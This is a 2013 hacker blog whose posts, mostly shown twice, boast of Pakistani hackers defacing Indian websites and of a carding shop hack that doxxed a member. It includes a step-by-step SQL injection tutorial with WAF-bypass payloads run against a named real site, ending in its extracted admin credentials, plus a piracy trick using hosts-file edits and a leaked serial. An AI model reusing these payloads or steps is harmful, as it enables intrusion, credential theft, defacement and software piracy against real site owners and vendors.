Thursday, 27 June 2013
Labels:
Cyber News
A Pakistani Hacker known by Hack Handle "H4x0rL1f3" Also known by another hack handle "Dr Trojan" rooted a very big server which contains Indian's websites which contains gov.in that mass defacement is very big that in a status post of his he told his followers that he's getting "Internal Server Error" while submitting the mirrors on Zone-h.com well afterwards he was successfully able to made all mirrors of his hacks.
Well the hacker which rooted the server was not visible in hacking field for a while some says that he leaved H4x0ring but the last night he was successfully able to peneterate the server and rooted it
it contains about 9000+ websites.
The message in the deface page by the hacker was simple he was just saying that "He is Back"
The mirrors were submitted on Zone h
Mirrors
The list of websites which was hacked are available in the link below.
Websites which was hacked
Well now the whole world knows that Pakistani Hackers are not lefted behind in hacking field they are still here was sleeping but not dead so expect them :)
Read More
Big Server Rooted By Dr Trojan Aka H4x0rL1f3
A Pakistani Hacker known by Hack Handle "H4x0rL1f3" Also known by another hack handle "Dr Trojan" rooted a very big server which contains Indian's websites which contains gov.in that mass defacement is very big that in a status post of his he told his followers that he's getting "Internal Server Error" while submitting the mirrors on Zone-h.com well afterwards he was successfully able to made all mirrors of his hacks.
Well the hacker which rooted the server was not visible in hacking field for a while some says that he leaved H4x0ring but the last night he was successfully able to peneterate the server and rooted it
it contains about 9000+ websites.
The message in the deface page by the hacker was simple he was just saying that "He is Back"
The mirrors were submitted on Zone h
Mirrors
The list of websites which was hacked are available in the link below.
Websites which was hacked
Well now the whole world knows that Pakistani Hackers are not lefted behind in hacking field they are still here was sleeping but not dead so expect them :)
Wednesday, 26 June 2013
Labels:
Cyber News
A Pakistani Hacker knows by hack handle "1337" well known for hacking many high profile domains like google of different countries.
Well another well known pakistani hacker crew which are also well known but caged in a controversy that the leader of PakBugs which is Zombie_Ksa a well known hacker is faked means someone faking Zombie_Ksa and running the shop of fake pakbugs but,
1337 is successfully able to pawn in there CC shops website (Black Market)
The Domain which was hacked by the hacker is
http://www.pakbugs.com/pakbugs-official-credit-card-sellng-shop/
http://cvvshop.ac/
The message given in the deface page was of exposion a crew member of PakBugs name Xploiter the hacker exposed his real identity which contains his phone number,personal picture and his real name
well this group was be as like bullet proof but that pakistani hacker has a hell a lot of skills :)
The mirrors of the hacked website are submitted on zone-h the original archive of hacktivism.
Mirrors are as follows
http://zone-h.net/mirror/id/20153170
http://zone-h.net/mirror/id/20153167
feel free to comment below. :)
Read More
PakBugs Pawn'd
A Pakistani Hacker knows by hack handle "1337" well known for hacking many high profile domains like google of different countries.
Well another well known pakistani hacker crew which are also well known but caged in a controversy that the leader of PakBugs which is Zombie_Ksa a well known hacker is faked means someone faking Zombie_Ksa and running the shop of fake pakbugs but,
1337 is successfully able to pawn in there CC shops website (Black Market)
The Domain which was hacked by the hacker is
http://www.pakbugs.com/pakbugs-official-credit-card-sellng-shop/
http://cvvshop.ac/
The message given in the deface page was of exposion a crew member of PakBugs name Xploiter the hacker exposed his real identity which contains his phone number,personal picture and his real name
well this group was be as like bullet proof but that pakistani hacker has a hell a lot of skills :)
The mirrors of the hacked website are submitted on zone-h the original archive of hacktivism.
Mirrors are as follows
http://zone-h.net/mirror/id/20153170
http://zone-h.net/mirror/id/20153167
feel free to comment below. :)
Sunday, 9 June 2013
Labels:
Cyber News
A Pakistani Hacker's Crew Namely "P4K-M4D-HUNT3R-Z" recently attack on Indian websites this team is well known for attacking on Indian website's,
Recently A hacker from this Crew knows with hack handle "Ch3rn0by1" attacks on Indian website the message was quite simple that they are taking revenge of abusing there religion,
Well bit before Indian hackers targeted Pakistani's domains and abuses there religion in there deface.
Well the message which was shown on the deface page is as follows :
"Welcome back Admin,your site got hacked!!!,Server Boxed :D,Indian lammer's never abuse our religion!!! I was testing your site security!!! now may be you know how secure it is :D,Well it was not enough to stop me :D,Hasta La Vista Babies :D ,GOTO HELL SECURE YOUR SITE"
The website which are successfully penetrated by the hacker contains the following domain's
DOMAINS :
1) http://hansum.in/
2) http://samwebstudio.co.in/
3) http://indiaeduspring.com/
4) http://christopher-fong.com/
5) http://travhawk.com/
6) http://www.saban.in/
1) http://www.zone-h.org/mirror/id/19991935
2) http://www.zone-h.org/mirror/id/19991936
3) http://www.zone-h.org/mirror/id/19991937
4) http://www.zone-h.org/mirror/id/19991938
5) http://www.zone-h.org/mirror/id/19991939
6) http://www.zone-h.org/mirror/id/19991940
Read More
Another Attack On Indian Website's
A Pakistani Hacker's Crew Namely "P4K-M4D-HUNT3R-Z" recently attack on Indian websites this team is well known for attacking on Indian website's,
Recently A hacker from this Crew knows with hack handle "Ch3rn0by1" attacks on Indian website the message was quite simple that they are taking revenge of abusing there religion,
Well bit before Indian hackers targeted Pakistani's domains and abuses there religion in there deface.
Well the message which was shown on the deface page is as follows :
"Welcome back Admin,your site got hacked!!!,Server Boxed :D,Indian lammer's never abuse our religion!!! I was testing your site security!!! now may be you know how secure it is :D,Well it was not enough to stop me :D,Hasta La Vista Babies :D ,GOTO HELL SECURE YOUR SITE"
The website which are successfully penetrated by the hacker contains the following domain's
DOMAINS :
1) http://hansum.in/
2) http://samwebstudio.co.in/
3) http://indiaeduspring.com/
4) http://christopher-fong.com/
5) http://travhawk.com/
6) http://www.saban.in/
MIRRORS :
The hacker made mirrors of hacked website on Zone-h which is the most popular archive of Hacktivism,
1) http://www.zone-h.org/mirror/id/19991935
2) http://www.zone-h.org/mirror/id/19991936
3) http://www.zone-h.org/mirror/id/19991937
4) http://www.zone-h.org/mirror/id/19991938
5) http://www.zone-h.org/mirror/id/19991939
6) http://www.zone-h.org/mirror/id/19991940
Monday, 20 May 2013
Labels:
Tutorials
Read More
How to bypass WAF ( Web Application Firewall ) in SQL injection.
Hi friends,
hopes you all are fine well,I have seen many peoples face 404 forbidden difficulties when they try to inject a website which have some good WAF's through sql injection so I was thinking to share a tutorial with you peoples which is written by my friend :P P4K M4D HUNT3R-Z St!k3r this tutorial is based on that how you can remember the word "can" bypass or get an idea that how to bypass waf 404 forbidden in sql injection well this tutorial is noob friendly and hopes you have some basic knowledge about SQL injection attack method if not then read it first CLICK HERE.
so let's start..
we have our target which has waf so we will try to bypass it and get the admin username and pass :D
http://www.gogame.co.in/news.php?id=189
so now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !
http://www.gogame.co.in/news.php?id=189'
nothing change ?
try to add before number
http://www.gogame.co.in/news.php?id=%27189
if still nothing happened to page the leave the site and move to next site !
but luckly i dont need to move to next site this site is vulnerable
http://www.gogame.co.in/news.php?id=189'
by adding this ' the result of page changed !
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by post DESC' at line 1
now you can see this msg on page !
mean this site can be hack !
------------------------------------------------------------------------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !
http://scan.subhashdasyam.com/admin-panel-finder.php
now we will paste the site link there
which is http://www.gogame.co.in/
and click on dump!
it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.gogame.co.in/admin/ is in green color rest of all are red !
mean http://www.gogame.co.in/admin/ is the admin panel of this website !
now open this page
it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.gogame.co.in/news.php?id=189'
this section again ! now write
http://www.gogame.co.in/news.php?id=189 order by 1--+-
the page remain same ?
http://www.gogame.co.in/news.php?id=189' order by 2--+-
same ?
continue this untill the error display on page !
http://www.gogame.co.in/news.php?id=189' order by 4--+-
same!
http://www.area96.it/news.php?nws=61' order by 5--+-
unknown columns
mean there is no 5 column in this !
so there are 4 column !
we got the column we will find the vulnerbale column now !
write
http://www.gogame.co.in/news.php?id=-189 union select 1,2,3,4--+-
ops 403 forbidden !
mod security :P
now we will bypass this shit
acually words are forbidden like select !
when u hit enter it has to go through firewall and select is forbidden so it will denied the command
so we have to trick it by using our brain
in database / * ! ` ~ ( ) these kind of symbol are not supported !
so when we if we add an extra sybol with select firewall will allow it ! so we can trick it !
http://www.gogame.co.in/news.php?id=-189 union /*!select*/ 1,2,3,4--
bypassed :P
now u can see 2 3 4 at the page as vuln columns !
these three numbers are displayed on the page !
mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !
now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.gogame.co.in/news.php?id=189 union select 1,group_concat(table_name),3,4--+-
and after 6 add "from Information_schema.tables"
like this
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat(table_name),3,4 from Information_schema.tables--+-
now enter
ops
again 403 forbidden !
we need to trick some more words !
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
function group_concat does not exist O_o
it seam like group_concat is not working so we will use only concat now
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
bypassed
now instead of number 2 column it will show tables name ! like this one
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
this mean it showing us the table name !
but we need user name and password which is located in the database of website
so we will use
database also to extract username and password !
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
just add 1 more line after information_schema.tables
which is "where table_schema=database()"
like this
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables where table_schema=database()--+-
now on the page !
it showing the database's tables !
Adminlogin
these are tables
now we will send the query to open adminlogin table !
change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"
but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !
for this you can use this site !
http://www.branah.com/ascii-converter
from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
97 100 109 105 110 108 111 103 105 110
now change it to
CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where table_name=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
ops again 403
table_name is forbidden
bypass
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where /*!table_name*/=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
the page show the result
usnd pdgame
this mean these are the columns of table adminlogin
now we will simply send the query to give us the username and password on the page !
just change
"(column_name)" to "(usnd,0x3a,pdgame)"
and after "from" remove all words and add "adminlogin"
0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(usnd,0x3a,pdgame)*/,3,4 from admin--+-
the page show this result
kolgo:gamekol
mean
1st user is
username=kolgo
password=gamekol
now we have the password we will move to admin panel to hack website
hopes you all are fine well,I have seen many peoples face 404 forbidden difficulties when they try to inject a website which have some good WAF's through sql injection so I was thinking to share a tutorial with you peoples which is written by my friend :P P4K M4D HUNT3R-Z St!k3r this tutorial is based on that how you can remember the word "can" bypass or get an idea that how to bypass waf 404 forbidden in sql injection well this tutorial is noob friendly and hopes you have some basic knowledge about SQL injection attack method if not then read it first CLICK HERE.
so let's start..
we have our target which has waf so we will try to bypass it and get the admin username and pass :D
http://www.gogame.co.in/news.php?id=189
so now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !
http://www.gogame.co.in/news.php?id=189'
nothing change ?
try to add before number
http://www.gogame.co.in/news.php?id=%27189
if still nothing happened to page the leave the site and move to next site !
but luckly i dont need to move to next site this site is vulnerable
http://www.gogame.co.in/news.php?id=189'
by adding this ' the result of page changed !
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by post DESC' at line 1
now you can see this msg on page !
mean this site can be hack !
------------------------------------------------------------------------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !
http://scan.subhashdasyam.com/admin-panel-finder.php
now we will paste the site link there
which is http://www.gogame.co.in/
and click on dump!
it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.gogame.co.in/admin/ is in green color rest of all are red !
mean http://www.gogame.co.in/admin/ is the admin panel of this website !
now open this page
it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.gogame.co.in/news.php?id=189'
this section again ! now write
http://www.gogame.co.in/news.php?id=189 order by 1--+-
the page remain same ?
http://www.gogame.co.in/news.php?id=189' order by 2--+-
same ?
continue this untill the error display on page !
http://www.gogame.co.in/news.php?id=189' order by 4--+-
same!
http://www.area96.it/news.php?nws=61' order by 5--+-
unknown columns
mean there is no 5 column in this !
so there are 4 column !
we got the column we will find the vulnerbale column now !
write
http://www.gogame.co.in/news.php?id=-189 union select 1,2,3,4--+-
ops 403 forbidden !
mod security :P
now we will bypass this shit
acually words are forbidden like select !
when u hit enter it has to go through firewall and select is forbidden so it will denied the command
so we have to trick it by using our brain
in database / * ! ` ~ ( ) these kind of symbol are not supported !
so when we if we add an extra sybol with select firewall will allow it ! so we can trick it !
http://www.gogame.co.in/news.php?id=-189 union /*!select*/ 1,2,3,4--
bypassed :P
now u can see 2 3 4 at the page as vuln columns !
these three numbers are displayed on the page !
mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !
now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.gogame.co.in/news.php?id=189 union select 1,group_concat(table_name),3,4--+-
and after 6 add "from Information_schema.tables"
like this
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat(table_name),3,4 from Information_schema.tables--+-
now enter
ops
again 403 forbidden !
we need to trick some more words !
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
function group_concat does not exist O_o
it seam like group_concat is not working so we will use only concat now
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
bypassed
now instead of number 2 column it will show tables name ! like this one
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
this mean it showing us the table name !
but we need user name and password which is located in the database of website
so we will use
database also to extract username and password !
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
just add 1 more line after information_schema.tables
which is "where table_schema=database()"
like this
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables where table_schema=database()--+-
now on the page !
it showing the database's tables !
Adminlogin
these are tables
now we will send the query to open adminlogin table !
change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"
but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !
for this you can use this site !
http://www.branah.com/ascii-converter
from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
97 100 109 105 110 108 111 103 105 110
now change it to
CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where table_name=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
ops again 403
table_name is forbidden
bypass
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where /*!table_name*/=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
the page show the result
usnd pdgame
this mean these are the columns of table adminlogin
now we will simply send the query to give us the username and password on the page !
just change
"(column_name)" to "(usnd,0x3a,pdgame)"
and after "from" remove all words and add "adminlogin"
0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(usnd,0x3a,pdgame)*/,3,4 from admin--+-
the page show this result
kolgo:gamekol
mean
1st user is
username=kolgo
password=gamekol
now we have the password we will move to admin panel to hack website
IMPORTANT NOTE :
well this tutorial is only for education purpose we are not responsible on that how you use this.....be aware
don't forget to comment ;)
Thursday, 9 May 2013
Labels:
Tricks
Hello friends hopes you all are fine :D
today i was thinking to share a trick with you people's which is written by my friend madCodE in this trick we are going to register IDM which is one of the best download manager out there :D
to full version without using a crack or patch !! interesting naah :D
So let's start
1) first of all… if you have any antivirus, deactivate it because we are going to edit c:/windows/system32/drivers/etc/hosts file
2) right click on it and select security tab
now press edit button and in users option .. select full control option and save it
3) now double click on hosts file , it will ask how to open file? use notepad to open it
4) now paste these links in hosts file and save it
127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
5) now open idm > registration >
first name = Haxor
last name = Kakka
email = haxor.py@facebook.com
serial = GZLJY-X50S3-0S20D-NFRF9
And hit enter :D voila you have registered the IDM without any patch or crack :D
enjoy ;)
Read More
Registering IDM without any patch or crack.
Hello friends hopes you all are fine :D
today i was thinking to share a trick with you people's which is written by my friend madCodE in this trick we are going to register IDM which is one of the best download manager out there :D
to full version without using a crack or patch !! interesting naah :D
So let's start
1) first of all… if you have any antivirus, deactivate it because we are going to edit c:/windows/system32/drivers/etc/hosts file
2) right click on it and select security tab
now press edit button and in users option .. select full control option and save it
3) now double click on hosts file , it will ask how to open file? use notepad to open it
4) now paste these links in hosts file and save it
127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
5) now open idm > registration >
first name = Haxor
last name = Kakka
email = haxor.py@facebook.com
serial = GZLJY-X50S3-0S20D-NFRF9
And hit enter :D voila you have registered the IDM without any patch or crack :D
enjoy ;)
Subscribe to:
Posts
(
Atom
)